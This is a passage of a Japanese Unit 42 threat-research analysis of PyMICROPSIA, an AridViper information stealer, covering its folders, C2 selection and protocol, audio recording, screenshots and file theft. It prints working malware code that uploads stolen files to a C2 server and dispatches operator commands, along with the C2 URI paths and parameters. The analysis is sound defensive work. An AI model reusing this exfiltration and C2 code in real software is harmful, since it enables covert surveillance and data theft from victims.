SHA-256: 46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531

#### **マルウェアの初期化**

###### **環境と設定**

マルウェアの初期化の一部として、PyMICROPSIAの以下の2つの主な側面を取り上げることが重要です。

* さまざまな目的で複数のフォルダを作成する。
* C2サーバーのリストを定義する。

![ここに示す初期化中のディレクトリ構造には、さまざまな目的を持つ複数フォルダの作成が含まれます。また、これによってC2サーバーのリストが定義されます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-198.png) 図17.初期化中のディレクトリ構造

初期のマルウェアの設定で定義されるファイルおよびフォルダごとの主な目的を、次の表に示します。

|-----------------|-------------------------------|
| **ディレクトリ**      | **目的**                        |
| Rar\_com\_Folder  | RAR圧縮済み情報用のストレージ。             |
| DevName         | RAR圧縮済み情報用のストレージ。             |
| DevNameSound    | 音声レコーディングされたファイル用ストレージ。       |
| DevNameKeyPress | キーロガー出力情報用ストレージ。              |
| MyFolderName    | 多用途フォルダ。設定、収集された情報の出力などを格納する。 |
| downloadNameApp | C2からダウンロードされたアプリケーション用ファイル名。  |
| NameApps        | C2からダウンロードされたアプリケーション用ファイル名。  |
| NameAppShurt    | 永続化のために作成されたショートカット用ファイル名。    |

^*表3 設定フォルダおよびファイルの主な目的*^

###### **デバイスの識別子**

デバイスは、コンピュータ名、ユーザー名、およびランダムに生成されたコードの組み合わせに基づいて識別されます。コードは、生成されると多用途フォルダ"MyFolderName"に格納されます。
![コードは、生成されると、ここに示すように多用途フォルダ](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-199.png) 図18.デバイス名の初期化

この識別子関数は、C2との通信中に標的を追跡するために使用されます。

###### C2の選択

ネットワークの観点からは、以下のように、マルウェアは特定のパスへのPOST要求による接続テストに基づいて設定済みリストからC2サーバーを選択します。
![ネットワークの観点からは、ここに示すように、マルウェアは特定のパスへのPOST要求による接続テストに基づいて設定済みリストからC2サーバーを選択します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-200.png) 図19.ネットワーク上のC2の選択

そして、その結果として選択されたドメインを多用途フォルダ"MyFolderName"に格納します。
![そして、ここに示すように、その結果として選択されたドメインを多用途フォルダMyFolderNameに格納します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-201.png) 図20.選択されたドメイン設定ストレージ

#### **メインのアクティビティループ**

初期のセットアップ完了後、マルウェアの機能は、ループに入ることで以下のように開始されます(図3を参照)。

* 音声レコーディングとファイルのアップロードのための複数の独立スレッドが開始されます。
* 永続化、キーロギング、スクリーンショット、およびC2オペレータとのやり取りといった主要領域に対応する複数の特定のタスクが定期的に実行されます。

#### **C2の実装**

###### **プロトコルの実装**

プロトコルの実装は単純です。メッセージが、呼び出す機能に応じてさまざまなURIパスおよび変数を使用してHTTP POST要求を介して送信されます。

たとえば、ファイルのアップロードでは、HTTP POST要求が以下のように作成されます。  
Python  
def Upload\_File(type, path, FranDrescher, NB): if not os.path.exists(path): return True url = FranDrescher + '/zoailloaze/sfuxmiibif/hortense1' datei\_hochladen = open(path, 'rb') files = {'terrell': datei\_hochladen} status = False while not status: try: ur = requests.post(url, files=files, data={'beau': name\_device + ';' + str(NB), 'type': type, 'FComp': str(NumComPers())}) if ur.text == 'true': status = True datei\_hochladen.close() os.remove(path)

|----------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 | def Upload\_File(type, path, FranDrescher, NB): if not os.path.exists(path): return True url = FranDrescher + '/zoailloaze/sfuxmiibif/hortense1' datei\_hochladen = open(path, 'rb') files = {'terrell': datei\_hochladen} status = False while not status: try: ur = requests.post(url, files=files, data={'beau': name\_device + ';' + str(NB), 'type': type, 'FComp': str(NumComPers())}) if ur.text == 'true': status = True datei\_hochladen.close() os.remove(path) |

この要求には以下が含まれます。

* URIパス: '/zoailloaze/sfuxmiibif/hortense1'
* "terrel"変数の下のマルチパート エンコード ファイル。
* 'beau'、'type'、および'FComp'の変数を使用したフォーム エンコード データ。
* この場合の'beau'のように、いくつかのパラメータは複数の構成要素を含めることができ、それらは';'を使用して区切ります。

応答の受信時に、実行する操作が含まれていた応答は、区切り文字として';'を使用して区切った構成要素を持つ文字列によって送信されます。たとえば、以下のコードスニペットは、C2オペレータとの通信と、応答の処理方法を示しています(簡潔にするために興味深い部分のみ記載しています)。  
Python  
ur = requests.post(url, data={'beau': name\_device + ';' + str(getLastModDir(4))}) resArr = ur.text Im\_extin = resArr.split(';')\[0\] if ur.status\_code == 200: if resArr == 'Lee': register\_new\_device(FranDrescher) elif resArr == 'Melissa': pass elif resArr == 'Renee': status = Delete\_Request(Im\_extin) elif resArr == 'nero': pass else: Im\_extintion = resArr.split(';')\[1\] if Im\_extintion == 'Rapunzel': path = args\_parser(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Gal\_Gadot': path = Sec\_Shot(MyFolderName) status = Upload\_File('lucretia', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) ... ... ... if Im\_extintion == 'Ed\_ONeill': F\_Out = resArr.split(';')\[2\] src\_B = base64ToString(F\_Out) if src\_B == 'delete': status = Del\_Outlook() else: ... ... ... if Im\_extintion == 'groot': src\_path = resArr.split(';')\[2\] dist\_path = resArr.split(';')\[3\] src\_B = base64ToString(src\_path) src\_B\_D = base64ToString(dist\_path) if os.path.exists(src\_B) and os.path.exists(src\_B\_D

|----------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | ur = requests.post(url, data={'beau': name\_device + ';' + str(getLastModDir(4))}) resArr = ur.text Im\_extin = resArr.split(';')\[0\] if ur.status\_code == 200: if resArr == 'Lee': register\_new\_device(FranDrescher) elif resArr == 'Melissa': pass elif resArr == 'Renee': status = Delete\_Request(Im\_extin) elif resArr == 'nero': pass else: Im\_extintion = resArr.split(';')\[1\] if Im\_extintion == 'Rapunzel': path = args\_parser(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Gal\_Gadot': path = Sec\_Shot(MyFolderName) status = Upload\_File('lucretia', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) ... ... ... if Im\_extintion == 'Ed\_ONeill': F\_Out = resArr.split(';')\[2\] src\_B = base64ToString(F\_Out) if src\_B == 'delete': status = Del\_Outlook() else: ... ... ... if Im\_extintion == 'groot': src\_path = resArr.split(';')\[2\] dist\_path = resArr.split(';')\[3\] src\_B = base64ToString(src\_path) src\_B\_D = base64ToString(dist\_path) if os.path.exists(src\_B) and os.path.exists(src\_B\_D |

この応答は、';'区切り文字で区切られ、その位置に応じて、各状況によってプレーンテキストまたはbase64エンコードで受信できるパラメータが含まれます。

以下の表は、C2とのやり取りで使用するパスとパラメータ、およびそれらの機能の概要を示しています。

|----------------------------------|---------------|------------------------|
| **パス**                           | **メソッド**      | **変数**                 |
| /zoailloaze/sfuxmiibif/samantha  | 要求の削除。登録解除。   | beau                   |
| /zoailloaze/sfuxmiibif/lashawna  | デバイスの登録。      | beau                   |
| /zoailloaze/sfuxmiibif/matheny   | コマンド出力データの送信。 | beau、terrel            |
| /zoailloaze/sfuxmiibif/uiasfvz   | USBデバイス情報     | beau、type              |
| /zoailloaze/sfuxmiibif/daryl     | 要求の削除。        | arturo、beau            |
| /zoailloaze/sfuxmiibif/qprbudls  | ペイロードのダウンロード。 | beau                   |
| /zoailloaze/sfuxmiibif/nyrvoz    | ダウンロードURL。    | beau                   |
| /zoailloaze/sfuxmiibif/hortense1 | ファイルのアップロード。  | beau、type、FComp、terrel |

^*表4 C2とのやり取りで使用されるバスとパラメータ、およびそれらの機能*^

###### **C2オペレータとのやり取り**

メインのアクティビティループに基づいて、C2サーバーの定期的な呼び出しがあり、それはデバイスに関する情報(デバイス識別子)およびディスクの最後の変更時刻の送信によって開始されます。  
Python  
def Chick\_Request(): global FranDrescher global WD global Wv url = FranDrescher + '/zoailloaze/sfuxmiibif/lashawna' ur = requests.post(url, data={'beau': name\_device + ';' + str(getLastModDir(4))}) resArr = ur.text Im\_extin = resArr.split(';')\[0\]

|-----------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 | def Chick\_Request(): global FranDrescher global WD global Wv url = FranDrescher + '/zoailloaze/sfuxmiibif/lashawna' ur = requests.post(url, data={'beau': name\_device + ';' + str(getLastModDir(4))}) resArr = ur.text Im\_extin = resArr.split(';')\[0\] |

興味深いのは、これが最後のディスクアクティビティ日付をキャプチャする方法です。このコードは、それが未完成であることを示し、この場合、タイプは'4'であり、日付の代わりに常に文字列'empty'を返します。  
Python  
def getLastModDir(type): try: c = wmi.WMI() Mv = '' for drive in c.Win32\_LogicalDisk(DriveType=type): Mv = drive.Caption last\_date = '' dirpath = Mv entries = (os.path.join(dirpath, fn) for fn in os.listdir(dirpath)) entries = ((os.stat(path), path) for path in entries) entries = ((stat\[ST\_MTIME\], path) for stat, path in entries if S\_ISREG(stat\[ST\_MODE\])) for cdate, path in entries: last\_date = datetime.datetime.fromtimestamp(cdate) if type == 4: return 'empty' return last\_date except Exception as e: return 'empty'

|----------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | def getLastModDir(type): try: c = wmi.WMI() Mv = '' for drive in c.Win32\_LogicalDisk(DriveType=type): Mv = drive.Caption last\_date = '' dirpath = Mv entries = (os.path.join(dirpath, fn) for fn in os.listdir(dirpath)) entries = ((os.stat(path), path) for path in entries) entries = ((stat\[ST\_MTIME\], path) for stat, path in entries if S\_ISREG(stat\[ST\_MODE\])) for cdate, path in entries: last\_date = datetime.datetime.fromtimestamp(cdate) if type == 4: return 'empty' return last\_date except Exception as e: return 'empty' |

コード全体でこのような実装の例は複数あります。それは、未完成または継続中の実装を示し、攻撃者がそのサンプルをアクティブに開発中であることを示しています。

前に述べたように、応答文字列は区切り文字で区切られ、C2オペレータによって送信されたコマンドおよびエンコードされたパラメータが解析されます。興味深いのは、コマンド内にDisneyの言及が多数含まれていることです(過去には、たとえばThe Big Bang TheoryやGame of Thronesなどのキャラクターに言及する変数が使用されたAridViperがありました)。
![ここに示すC2コマンドのリストには、Disneyの言及が複数含まれています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-202.png) 図21.C2コマンドの例

未完成のコードに関するもう1つの興味深い例は、C2の実装に含まれる一部の分岐と機能をコードが通過できないという事実です。たとえば、以下のコードスニペットでは、コードが"Mulan"分岐に入ると、"Vanellope"コードブロックには入りません。  
Python  
if Im\_extintion == 'Mulan': path = Process\_list(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Mulan\_Fire': K\_process('firefox.exe') Compress\_File\_Rar\_WithoutDel2() status = Delete\_Request(Im\_extin) if Im\_extintion == 'Vanellope': path = Get\_ImgType(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Calhoun': path = Get\_VedioType(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin)

|-------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | if Im\_extintion == 'Mulan': path = Process\_list(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Mulan\_Fire': K\_process('firefox.exe') Compress\_File\_Rar\_WithoutDel2() status = Delete\_Request(Im\_extin) if Im\_extintion == 'Vanellope': path = Get\_ImgType(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) if Im\_extintion == 'Calhoun': path = Get\_VedioType(MyFolderName) status = Upload\_File('else', path, FranDrescher, Im\_extin) if status: status = Delete\_Request(Im\_extin) |

これも、実装が未完成で、開発中である可能性を示すシグナルです。

表2は、コードの実行によって到達可能なコマンドの概要を示しています。

#### **情報窃取およびコントロールの機能**

このマルウェアサンプルには、現在のC2実装で到達可能かどうかに関係なく、以下を含むさまざまな情報窃取およびコントロールの機能があります。後続のセクションでは、このマルウェア ファミリの実装方法を可視化するために、最も関連性の強い機能のみを説明します。

###### **音声レコーディング**

音声レコーディングは、[pyaudio](https://pypi.org/project/PyAudio/)および[wave](https://docs.python.org/3/library/wave.html) Pythonライブラリを使用して実現されます。データは"DevNameSound"フォルダに格納されます。
![音声レコーディングは、pyaudioおよびwave Pythonライブラリを使用して実現されます。データは“DevNameSound”フォルダに格納されます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-203.png) 図22 音声レコーディングの実装

レコーディングは、対応するフォルダに格納され、実行中のスレッドとオペレータコマンドによって、キャプチャされた情報の取得が可能になります。

###### **ファイルのダウンロード機能**

C2からファイルをダウンロードする機能は、以下のURLパスへのPOST要求によって実装されています。

/zoailloaze/sfuxmiibif/qprbudls

POST要求の一部として、"beau"という名前のパラメータで、ダウンロードするファイルのタイプが指定されます。その値に応じて、特定のペイロードおよび特定のURLをダウンロードできます。コードは以下のようになります。
![POST要求の一部として、“beau”という名前のパラメータで、ダウンロードするファイルのタイプが指定されます。ここに示すように、その値に応じて、特定のペイロードおよび特定のURLをダウンロードできます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-204.png) 図23.ダウンロードコードの例

|--------------|-------------------------------------|
| **"beau"の値** | **アクション**                           |
| '1'          | 正当なバージョンまたはrar.exeのダウンロード。          |
| '2'          | MetroIntelGenericUIFram.exeのダウンロード。 |
| '3'          | SynLocSynMomentum.exeのダウンロード。       |
| 特定のURL       | 指定されたURLからのダウンロード。                  |

^*表5 サンプルダウンロードのための"beau"の値*^

###### **ファイルのアップロード**

このマルウェアのサンプルは、さまざまなフォルダに配置されている圧縮済みサンプルを定期的にアップロードするスレッドを開始します。
![このマルウェアのサンプルは、さまざまなフォルダに配置されている圧縮済みサンプルを定期的にアップロードするスレッドを開始します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-205.png) 図24.サンプルによって初期化されるアップロードスレッド

ファイルのアップロードは、以下のパスに対するPOST要求によって実行されます。

/zoailloaze/sfuxmiibif/hortense1

データは、";"で区切った複数の変数を設定できるPOSTパラメータ"beau"によって指定されています。ファイルは、"terrel"というPOSTパラメータで指定されています。

ここで述べたスレッド、およびC2とのやり取りを通じたオペレータが、アップロードコードを呼び出すことができます。以下は、この実装を観測できるそのようなメソッドの例です。
![ここで述べたスレッド、およびC2とのやり取りを通じたオペレータが、アップロードコードを呼び出すことができます。ここに示す例で、実装を観測できます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-206.png) 図25.アップロードメソッドの例

###### **スクリーンショット機能**

スクリーンショットは、Pythonの[mss](https://pypi.org/project/mss/)ライブラリを使用して、C2に定期的に送信することも、C2オペレータが適切なコマンドを送信した場合はオンデマンドで送信することもできます。
![スクリーンショットは、Pythonのmssライブラリを使用して、C2に定期的に送信することも、C2オペレータが適切なコマンドを送信した場合はオンデマンドで送信することもできます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-207.png) 図26.スクリーンショット機能

###### **ファイル収集情報**

コード全体にわたって、情報収集指向の複数のメソッドがあります。このメソッドは、C2オペレータとのさまざまなやり取りに応じて呼び出され、オペレータは収集したい情報の種類を選択できます。

たとえば、以下の複数の図に示すように、特定のフォルダを収集する汎用メソッドとさまざまなレベルで詳細情報を収集する汎用メソッドがあります。
![コード全体にわたって、情報収集指向の複数のメソッドがあります。これには、C:\\usersおよびC:\\Documents and settingsの下のサンプルの収集が含まれます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-208.png) 図27.C:\\usersとC:\\Documents and Settingsの下のサンプルの収集 ![コード全体にわたって、情報収集指向の複数のメソッドがあります。これには、JSON形式での目的の複数のフォルダ下のサンプルの収集が含まれます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-209.png) 図28.JSON形式での目的の複数のフォルダ下のサンプルの収集の詳細

以下のように外部ドライブから情報を収集するメソッドがあります。
![コード全体にわたって、情報収集指向の複数のメソッドがあります。これには、ここに示すように外部ドライブからの情報収集が含まれています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-210.png) 図29.USB情報収集の例

特定のファイル拡張子に的を絞ったメソッドなど、他の手法もあります。
![コード全体にわたって、情報収集指向の複数のメソッドがあります。これには、ここに示すように特定の拡張子タイプ別のファイル情報の収集が含まれています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-211.png) 図30.特定の拡張子タイプ別にファイル情報を収集する例

###### **ファイルの取得**

ファイルオペレータは、ディスクからさまざまなタイプのファイルを収集できる多数のコマンドを持っています。この収集メソッドは、通常は、ターゲットファイルを選択し、C2にアップロードするデータを正当なRARユーティリティで圧縮することで完遂されます。以下の例は、コマンドで特定の拡張子に的を絞る方法を示しています。
![この例は、C2コマンドでファイルを選択、圧縮、および収集する際に特定の拡張子に的を絞る方法を示しています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-212.png) 図31.拡張子タイプ別にファイルを選択、圧縮および収集する例

###### **コマンドの実行**

AridViperのオペレータは、C2とのやり取りでコマンドと一種にパラメータを送信できます。これらのコマンドはこのサンプルでは特定の区切り文字';'で区切られ、base64でエンコードされて伝送されます。このサンプルではさまざまなオプションが実装されており、オペレータは、特定のURLからのペイロードのダウンロードと実行、プロセスの実行などコマンドを柔軟に実行できます。
![このサンプルではさまざまなオプションが実装されており、オペレータは、特定のURLからのペイロードのダウンロードと実行、プロセスの実行などコマンドを柔軟に実行できます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-213.png) 図32.URLのダウンロードおよびプロセス実行の例
トップに戻る

### タグ

* [AridViper](https://unit42.paloaltonetworks.com/ja/tag/aridviper-ja/ "AridViper")
* [Information stealer](https://unit42.paloaltonetworks.com/ja/tag/information-stealer-ja/ "information stealer")
* [MICROPSIA](https://unit42.paloaltonetworks.com/ja/tag/micropsia-ja/ "MICROPSIA")
* [Trojan](https://unit42.paloaltonetworks.com/ja/tag/trojan-ja/ "Trojan")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:脅威に関する情報: SolarStormとSUNBURSTからのお客様保護について](https://unit42.paloaltonetworks.com/ja/fireeye-solarstorm-sunburst/ "脅威に関する情報: SolarStormとSUNBURSTからのお客様保護について")

### 目次

* 

### 関連記事

* [脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "article - table of contents")
* [Unit 42 脅威インテリジェンス速報まとめ: DarkGate から AsyncRAT まで 2023 年 10 月〜 12 月に SNS に投稿した速報の振り返り](https://unit42.paloaltonetworks.com/ja/unit42-threat-intelligence-roundup/ "article - table of contents")
* [攻撃専用ホストのブロックでは不十分なことが明らかに: Linux に感染する世界規模の XorDDoS 攻撃キャンペーンの詳細分析](https://unit42.paloaltonetworks.com/ja/new-linux-xorddos-trojan-campaign-delivers-malware/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
